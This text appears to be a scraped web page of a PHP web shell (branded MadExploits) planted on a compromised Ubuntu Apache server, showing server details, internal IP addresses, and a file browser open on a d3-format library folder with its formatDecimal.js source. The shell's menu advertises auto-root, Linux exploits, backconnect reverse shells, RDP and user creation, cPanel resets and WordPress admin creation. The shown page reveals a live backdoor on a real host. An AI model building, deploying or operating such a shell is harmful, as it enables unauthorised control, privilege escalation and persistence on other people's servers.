Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
d3-format /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
defaultLocale.js
348
B
-rw-r--r--
exponent.js
149
B
-rw-r--r--
formatDecimal.js
822
B
-rw-r--r--
formatGroup.js
475
B
-rw-r--r--
formatNumerals.js
154
B
-rw-r--r--
formatPrefixAuto.js
631
B
-rw-r--r--
formatRounded.js
473
B
-rw-r--r--
formatSpecifier.js
1.68
KB
-rw-r--r--
formatTrim.js
399
B
-rw-r--r--
formatTypes.js
627
B
-rw-r--r--
identity.js
43
B
-rw-r--r--
index.js
415
B
-rw-r--r--
locale.js
6.03
KB
-rw-r--r--
precisionFixed.js
122
B
-rw-r--r--
precisionPrefix.js
193
B
-rw-r--r--
precisionRound.js
189
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : formatDecimal.js
export default function(x) { return Math.abs(x = Math.round(x)) >= 1e21 ? x.toLocaleString("en").replace(/,/g, "") : x.toString(10); } // Computes the decimal coefficient and exponent of the specified number x with // significant digits p, where x is positive and p is in [1, 21] or undefined. // For example, formatDecimalParts(1.23) returns ["123", 0]. export function formatDecimalParts(x, p) { if ((i = (x = p ? x.toExponential(p - 1) : x.toExponential()).indexOf("e")) < 0) return null; // NaN, ±Infinity var i, coefficient = x.slice(0, i); // The string returned by toExponential either has the form \d\.\d+e[-+]\d+ // (e.g., 1.2e+3) or the form \de[-+]\d+ (e.g., 1e+3). return [ coefficient.length > 1 ? coefficient[0] + coefficient.slice(2) : coefficient, +x.slice(i + 1) ]; }
Close